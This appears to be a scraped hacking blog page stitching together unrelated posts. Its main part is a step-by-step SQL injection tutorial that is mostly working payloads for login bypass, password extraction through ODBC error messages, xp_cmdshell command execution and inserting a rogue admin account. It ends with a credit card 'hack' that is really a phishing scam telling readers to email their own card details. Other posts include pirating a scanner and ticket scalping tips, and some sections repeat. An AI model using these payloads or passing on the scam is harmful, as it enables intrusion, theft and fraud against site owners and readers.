http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--
We can now login as "neo2" with the password of "newpas5".
8.0 How to avoid SQL Injection?
Filter out character like single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc, in all strings from:
- Input from users
- Parameters from URL
- Values from cookie
For numeric value, convert it to an integer before parsing it into SQL statement. Or using ISNUMERIC to make sure it is an integer.
Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.
Delete stored procedures that you are not using like:
master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
9.0 Where can I get more info?
One of the earliest works on SQL Injection we have encountered should be the paper from Rain Forest Puppy about how he hacked PacketStorm.
http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6
Great article on gathering information from ODBC error messages:
http://www.blackhat.com/presentations/win-usa-01/Litchfield/BHWin01Litchfield.doc
A good summary of SQL Injection on various SQL Server on
http://www.owasp.org/asac/input_validation/sql.shtml
Senseport's article on reading SQL Injection:
http://www.sensepost.com/misc/SQLinsertion.htm
Other worth readings:
http://www.digitaloffense.net/wargames01/IOWargames.ppt
http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=6
http://www.wiretrip.net/rfp/p/doc.asp?id=60&iface=6
http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf
When a machine has only port 80 opened, your most trusted vulnerability scanner cannot return anything useful, and you know that the admin always patch his server, we have to turn to web hacking. SQL injection is one of type of web hacking that require nothing but port 80 and it might just work even if the admin is patch-happy. It attacks on the web application (like ASP, JSP, PHP, CGI, etc) itself rather than on the web server or services running in the OS.
This article does not introduce anything new, SQL injection has been widely written and used in the wild. We wrote the article because we would like to document some of our pen-test using SQL injection and hope that it may be of some use to others. You may find a trick or two but please check out the "9.0 Where can I get more info?" for people who truly deserve credit for developing many techniques in SQL injection.
1.1 What is SQL Injection?
It is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.
1.2 What do you need?
Any web browser.
2.0 What you should look for?
Try to look for pages that allow you to submit data, i.e: login page, search page, feedback, etc. Sometimes, HTML pages use POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:
<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>
Everything between the <FORM> and </FORM> have potential parameters that might be useful (exploit wise).
2.1 What if you can't find any page that takes input?
You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URL that takes parameters, like:
http://duck/index.asp?id=10
3.0 How do you test if it is vulnerable?
Start with a single quote trick. Input something like:
hi' or 1=1--
Into login, or password, or even in the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://duck/index.asp?id=hi' or 1=1--
If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly. Example:
<FORM action=http://duck/Search/search.asp method=post>
<input type=hidden name=A value="hi' or 1=1--">
</FORM>
If luck is on your side, you will get login without any login name or password.
3.1 But why ' or 1=1--?
Let us look at another example why ' or 1=1-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an asp page that will link you to another page with the following URL:
http://duck/index.asp?category=food
In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that we created for this exercise):
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:
SELECT * FROM product WHERE PCategory='food'
The query should return a resultset containing one or more rows that match the WHERE condition, in this case, 'food'.
Now, assume that we change the URL into something like this:
http://duck/index.asp?category=food' or 1=1--
Now, our variable v_cat equals to "food' or 1=1-- ", if we substitute this in the SQL query, we will have:
SELECT * FROM product WHERE PCategory='food' or 1=1--'
The query now should now select everything from the product table regardless if PCategory is equal to 'food' or not. A double dash "--" tell MS SQL server ignore the rest of the query, which will get rid of the last hanging single quote ('). Sometimes, it may be possible to replace double dash with single hash "#".
However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try
' or 'a'='a
The SQL query will now become:
SELECT * FROM product WHERE PCategory='food' or 'a'='a'
It should return the same result.
Depending on the actual SQL query, you may have to try some of these possibilities:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
4.0 How do I get remote execution with SQL injection?
Being able to inject SQL command usually mean, we can execute any SQL query at will. Default installation of MS SQL Server is running as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
Try using double quote (") if single quote (') is not working.
The semi colon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen to ICMP packet from 10.10.1.2, check if there is any packet from the server:
#tcpdump icmp
If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures.
5.0 How to get output of my SQL query?
It is possible to use sp_makewebtask to write your query into an HTML:
'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"
But the target IP must folder "share" sharing for Everyone.
6.0 How to get data from the database using ODBC error message
We can use information from error message produced by the MS SQL Server to get almost any data we want. Take the following page for example:
http://duck/index.asp?id=10
We will try to UNION the integer '10' with another string from the database:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
The system table INFORMATION_SCHEMA.TABLES contains information of all tables in the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-
This should return the first table name in the database. When we UNION this string value to an integer 10, MS SQL Server will try to convert a string (nvarchar) to an integer. This will produce an error, since we cannot convert nvarchar to int. The server will display the following error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5
The error message is nice enough to tell us the value that cannot be converted into an integer. In this case, we have obtained the first table name in the database, which is "table1".
To get the next table name, we can use the following query:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--
We also can search for data using LIKE keyword:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5
The matching patent, '%25login%25' will be seen as %login% in SQL Server. In this case, we will get the first table name that matches the criteria, "admin_login".
6.1 How to mine all column names of a table?
We can use another useful table INFORMATION_SCHEMA.COLUMNS to map out all columns name of a table:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5
Now that we have the first column name, we can use NOT IN () to get the next column name:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5
When we continue further, we obtained the rest of the column name, i.e. "password", "details". We know this when we get the following error message:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5
6.2 How to retrieve any data we want?
Now that we have identified some important tables, and their column, we can use the same technique to gather any information we want from the database.
Now, let's get the first login_name from the "admin_login" table:
http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
/index.asp, line 5
We now know there is an admin user with the login name of "neo". Finally, to get the password of "neo" from the database:
http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
/index.asp, line 5
We can now login as "neo" with his password "m4trix".
6.3 How to get numeric string value?
There is limitation with the technique describe above. We cannot get any error message if we are trying to convert text that consists of valid number (character between 0-9 only). Let say we are trying to get password of "trinity" which is "31173":
http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--
We will probably get a "Page Not Found" error. The reason being, the password "31173" will be converted into a number, before UNION with an integer (10 in this case). Since it is a valid UNION statement, SQL server will not throw ODBC error message, and thus, we will not be able to retrieve any numeric entry.
To solve this problem, we can append the numeric string with some alphabets to make sure the conversion fail. Let us try this query instead:
http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--
We simply use a plus sign (+) to append the password with any text we want. (ASSCII code for '+' = 0x2b). We will append '(space)morpheus' into the actual password. Therefore, even if we have a numeric string '31173', it will become '31173 morpheus'. By manually calling the convert() function, trying to convert '31173 morpheus' into an integer, SQL Server will throw out ODBC error message:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
/index.asp, line 5
Now, you can even login as 'trinity' with the password '31173'.
7.0 How to update/insert data into the database?
When we successfully gather all column name of a table, it is possible for us to UPDATE or even INSERT a new record in the table. For example, to change password for "neo":
http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--
To INSERT a new record into the database:
http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--
We can now login as "neo2" with the password of "newpas5".
8.0 How to avoid SQL Injection?
Filter out character like single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc, in all strings from:
- Input from users
- Parameters from URL
- Values from cookie
For numeric value, convert it to an integer before parsing it into SQL statement. Or using ISNUMERIC to make sure it is an integer.
Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.
Delete stored procedures that you are not using like:
master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
9.0 Where can I get more info?
One of the earliest works on SQL Injection we have encountered should be the paper from Rain Forest Puppy about how he hacked PacketStorm.
http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6
Great article on gathering information from ODBC error messages:
http://www.blackhat.com/presentations/win-usa-01/Litchfield/BHWin01Litchfield.doc
A good summary of SQL Injection on various SQL Server on
http://www.owasp.org/asac/input_validation/sql.shtml
Senseport's article on reading SQL Injection:
http://www.sensepost.com/misc/SQLinsertion.htm
Other worth readings:
http://www.digitaloffense.net/wargames01/IOWargames.ppt
http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=6
http://www.wiretrip.net/rfp/p/doc.asp?id=60&iface=6
http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf
Thursday, November 29, 2012
25 Backtrack 5 Tutorials
Backtrack is one the favorite distribution for penetration testing, the latest version of backtrack is backtrack 5, so we have decided to dedicate a separate section for backtrack5 tutorials.
Some tutorial may applicable on other version and distro as well, we have decided to update this section quickly to keep visiting to update yourself with latest backtrack 5 tutorial.
Nessus With Metasploit Tutorial- Backtrack 5 Video Tutorial
How to Install Damn Vulnerable Web App in Linux Backtrack 5 R1
How To Install Nessus In Backtrack 5 R1 Tutorial
Buffer Overflow Attack Tutorial - Backtrack 5
Armitage and Metasploit Video Tutorial – Hacking Training
Metagoofil Backtrack 5 Tutorial-Metadata Analyzer Information Gathering Tool
Social Engineering toolkit Tutorial-Backtrack 5
DNS Spoofing- Ettercap Backtrack5 Tutorial
Maltego Information Gathering Backtrack 5
Nessus Setup On Backtrack 5
Skipfish- Backtrack5 Tutorial
Backtrack 5- OpenVas Tutorial
How TO Install Backtrack5
How To Install Backtrack 5 Dual Boot-Tutorial
Virtualbox- Setup Windows On Linux Backtrack 5
Crack SSL Using SSLStrip With BackTrack5
Integrate Nmap With Nessus- Tutorial
Fast Track Hacking-Backtrack5 Tutorial
Integrate Nessus With Metasploit- Tutorial
How To Use Armitage In Backtrack 5- Tutorial
Backtrack 5- DNSenum Information Gathering Tool
WordPress Security Scanner- WPscan
Tips to Improve Linux Backtrack 5 Performance
Karmetasploit- Backtrack 5 Tutorial
Theharvester Backtrack 5- Information Gathering Tutorial
Backtrack is one the favorite distribution for penetration testing, the latest version of backtrack is backtrack 5, so we have decided to dedicate a separate section for backtrack5 tutorials.
Some tutorial may applicable on other version and distro as well, we have decided to update this section quickly to keep visiting to update yourself with latest backtrack 5 tutorial.
Nessus With Metasploit Tutorial- Backtrack 5 Video Tutorial
How to Install Damn Vulnerable Web App in Linux Backtrack 5 R1
How To Install Nessus In Backtrack 5 R1 Tutorial
Buffer Overflow Attack Tutorial - Backtrack 5
Armitage and Metasploit Video Tutorial – Hacking Training
Metagoofil Backtrack 5 Tutorial-Metadata Analyzer Information Gathering Tool
Social Engineering toolkit Tutorial-Backtrack 5
DNS Spoofing- Ettercap Backtrack5 Tutorial
Maltego Information Gathering Backtrack 5
Nessus Setup On Backtrack 5
Skipfish- Backtrack5 Tutorial
Backtrack 5- OpenVas Tutorial
How TO Install Backtrack5
How To Install Backtrack 5 Dual Boot-Tutorial
Virtualbox- Setup Windows On Linux Backtrack 5
Crack SSL Using SSLStrip With BackTrack5
Integrate Nmap With Nessus- Tutorial
Fast Track Hacking-Backtrack5 Tutorial
Integrate Nessus With Metasploit- Tutorial
How To Use Armitage In Backtrack 5- Tutorial
Backtrack 5- DNSenum Information Gathering Tool
WordPress Security Scanner- WPscan
Tips to Improve Linux Backtrack 5 Performance
Karmetasploit- Backtrack 5 Tutorial
Theharvester Backtrack 5- Information Gathering Tutorial
Wednesday, November 28, 2012
Acunetix Hacks: For those who Dont Know.
Acunetix is one of the famous and powerful tool used to find
out the vulnerabilities present in any website. It has several options
representing the vulnerabilities of the site,
It shows most of the common vulnerabilities present in any web site, like
- Sql injection flaw,
- directory listing, etc.,
It also has HTTP Crawler, fuzzer , Brute force password attacker etc.,
You can download the trial acunetix from its official website
http://www.acunetix.com/vulnerability-scanner/download.htm and of course you can get the full version from torrent and other such website,
The working is also very simple that we have to give the url, and also we can customize the scanning method also.
There are many other such tools actually available
one by IBM is also there namely IBM Rational App Scan, you can try this
also but , As a hacker it finally relys on our hand that how could we
make best use of it.
RED Cameras Are Now Much Cheaper
RED’s Hollywood-worthy HD video cameras just got way, way cheaper. On Friday, CEO Jim Jannard (who also founded eyewear goliath Oakley) posted in a RED users’ forum that the company would be reducing the price of many of its professional-grade cameras by up to 45 percent. According to Jannard, the price drop is the result of the company’s incredibly efficient factory in Irvine, California.
Yes, you read that right. A company managed to lower its own costs — while manufacturing in the U.S., no less — and rather than just keeping the higher margins, it passed the savings on to consumers. Nice one, Jannard.
If you’re in the market for a RED camera, here are the new prices, with some old ones in parenthesis, for reference:
– 5K EPIC-X Brain: $19,000 (down from $34,500)
– 5K EPIC-X Monochrome Brain: $20,000
– 5K EPIC-M Brain: $24,000 (down from $39,500)
– 5K/4K Scarlet Brain: $7,950 (down from $9,700)
– 4.5K RED ONE M-X Battle Tested: $4,000
Jannard posted on the same RED forum on Oct. 26 that the price cuts were coming. He wrote, “We can continue to charge the same for an EPIC (and now make an obscene amount of profit) or lower the price.” When’s the last time a CEO gave up the chance to buy an island so auteurs could afford to shoot another movie about isolation and desperation on the beach?
How To Be A Ticket Scalper
- Buy the cheapest, most worthless seats in the entire stadium for a sporting event, concert, etc.
- Stand just beyond the sightline of the people who take tickets at the door/ the ticket booth.
- Call out "Who needs Tickets! I got X tickets cheap!" whilst holding your tickets above your head. X= the number of tickets you have in your possession. It's best to just have 1 ticket first, so that if it doesn't work, at least you didn't waste a bunch of your money.
- Take the money the first idiot offers you and go buy some more tickets (and make sure the money that he/she gives you is worth more than the amount you bought the tickets for).
- If things are going smooth, Purchase tickets for future events and sell them online before the day of. And if they dont sell online then you can always go there..
- Oh, depending where you are, watch out for police. They will take your tickets and may even take you to Jail . Most places I've scalped the police wasnt trippin' just dont sell on the property. Across the street is fine.
Magic Lantern 2.3 Firmware Update
The testing phase for Magic Lantern 2.3 is over. Magic Lantern 2.3 release version is now here and the creators say it's no longer a "hack".
We can safely say it's no longer a hack, but it's strongly heading towards a solid piece of engineering that you can trust.
We have worked a lot on bug-fixing and usability improvements and we sincerely hope you will find it a great companion for all your shooting sessions - from hobbyist to professional.
Key Features:
- Full support for 5D mark II
- Supports latest Canon firmware for 5D mark II, 60D, 600D and 50D
- Fast Zebras
- Customizable menu and shortcut keys
- Automatic HDR bracketing
- Timelapse features
- Advanced ISO control (ISO 80, improved highlight rolloff, ISO 51200...)
- Advanced FPS control (24.000 FPS and 0.2 FPS possible)
- New menu design
- Image analysis tools in photo mode
- Contrast and saturation adjustments for LiveView
- Improved Stability
- Very fast playback zoom
I really liked the video that showcases the Magic Lantern HDR functionality:
We can safely say it's no longer a hack, but it's strongly heading towards a solid piece of engineering that you can trust.
We have worked a lot on bug-fixing and usability improvements and we sincerely hope you will find it a great companion for all your shooting sessions - from hobbyist to professional.
Key Features:
- Full support for 5D mark II
- Supports latest Canon firmware for 5D mark II, 60D, 600D and 50D
- Fast Zebras
- Customizable menu and shortcut keys
- Automatic HDR bracketing
- Timelapse features
- Advanced ISO control (ISO 80, improved highlight rolloff, ISO 51200...)
- Advanced FPS control (24.000 FPS and 0.2 FPS possible)
- New menu design
- Image analysis tools in photo mode
- Contrast and saturation adjustments for LiveView
- Improved Stability
- Very fast playback zoom
I really liked the video that showcases the Magic Lantern HDR functionality:
Hack Valid Credit Card Numbers With CVV Numbers Easy
Hack Valid Credit Card Numbers With CVV Numbers Easily
Scientific American ( www.sciam.com ) has published an article entitled 'How to steal millions in chump change' which was about online credit card theft.
Before going shopping online, every customer has to register online
with his/her credit card information and they'll leave their emails too
so that those shopping websites will confirm their registration. For
those online shoppers who used yahoo emails, their credit card info is
automatically stored in the yahoo server when the companies send to
them confirmation emails. However, there is a BIG bug in the server
that those people's credit card information can be retrieved by any
random email user who has a VALID credit card. To simplify this, here
is how it works:
Send an Email to confuse a yahoo server mailbot, so that it will return
to YOUR EMAIL with complete information on people's credit card
information stored in the server in the last 72 hours. This is how you
will get people's VALID credit card information. Now you have to do
exactly the same as follows:
send the message to bot_servicing@yahoo.com
then where it says SUBJECT you write accntopp-cc-E52488-verify-info
now for the body of the email write how it is below (in lower case letters and using your own details)
boundary="0-86226711-CC-Verificator-106343"
Content-Type: text/plain; charset=us-ascii
card number (use your own)
0000000000 (a zero for every digit)
name on card (use your own)
0000000000 (a zero for every letter)
date of birth (use your own)
00000000000 (a zero for every digit)
cid/cvv2 number (on back of your card)
000 (should be 3 or 4 zeros)
address linked to card (use the one linked to your card)
0000000000000000000 (a zero for every number and digit)
city,state and zip code (use the one linked to card)
0000000000000000000 (a zero for every letter and digit)
phone number (use your own)
00000000000 (a zero for every digit)
type of card (mastercard, visa etc)
0000000000 (a zero for every letter)
expiry date (use the one on card)
000000 (a zero for every digit)
your email address (use your every day email for this)
0000000000000000 (a zero for every character)
252ads< m >
return-path:
Once again, you have to make sure that you DO NOT COPY THE SAMPLE EMAIL ABOVE, because it will NOT work!!! It is there to help you set it up. Instead, you MUST provide A VALID AND CORRECT CARD, otherwise you will NOT get the information you want.
Subscribe to:
Posts (Atom)